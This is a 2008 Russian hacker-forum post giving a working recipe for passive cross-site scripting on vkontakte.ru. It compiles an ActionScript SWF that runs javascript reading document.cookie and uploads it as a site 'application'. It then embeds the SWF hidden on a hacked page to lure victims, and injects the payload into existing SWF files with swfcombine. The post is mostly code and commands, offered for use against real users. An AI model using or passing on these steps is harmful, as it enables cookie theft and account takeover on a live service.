Форум АНТИЧАТ - vkontakte.ru passive xss (swf)

vkontakte.ru passive xss (swf)

25.03.2008, 10:13

+toxa+

[Лишённый самовыражени

Регистрация: 16.01.2005

Сообщений: 1,787

Провел на форуме:
9751379

Репутация: 3812

Отправить сообщение для +toxa+ с помощью ICQ

Отправить сообщение для +toxa+ с помощью AIM

vkontakte.ru passive xss (swf)

Качаем mtask
Создаём файлик hek.as с содержанием

PHP код:


		
			
class hek{

  function hek() {

  }



  static function main(mc) {

    getURL("javascript:alert(document.cookie);");

  }

}

Далее компилим

Код:

mtasc.exe -swf hek.swf -main -header 1:1:1 hek.as

В настройках делаем доступным сервис "Приложения", обзываем его как-нить и заливаем наш скомпиленный hek.swf +)
Смотрим созданное "приложение" и выдираем ссылку на swf

PHP код:


		
			
...

<script type="text/javascript">

//<![CDATA[

var so = new SWFObject('evil_swf_on_vk','player',"1","1",'9');

so.addParam("allowfullscreen","false");

so.addParam("allownetworking", "all");

...

вот собственно и всё) кодес можно любой

Применение:
1) Можно вставить в сорц похэканного сайта кодес

PHP код:


		
			
<u style="display:none">

<embed src="evil_swf_on_vk" width="1" height="1" type="application/x-shockwave-flash"></embed>

</u>

и кинуть ссылку жертве)

2) Можно протроянить уже существующее swf приложение с помощью swfcombine из пака Swftools
Анализируем приложение в которое будем вживлять наш злостный кодес с помощью swfdump

Код:

swfdump.exe hek.swf

компилим с нужными параметрами злобнокодес (а именно меняем флаг -header)

Код:

mtasc.exe -swf hek.swf -main -header x:y:z hek.as

x и y - размеры, z - частота кадров в секунду
и вживляем

Код:

swfcombine.exe -o hek_movie.swf -T hek.swf movie.swf

Демо с алертом

Ссылки по теме:
http://tech.motion-twin.com/zip/mtasc-1.12.zip
http://www.swftools.org/swftools-0.7.0.exe

__________________

Последний раз редактировалось +toxa+; 25.03.2008 в 10:35..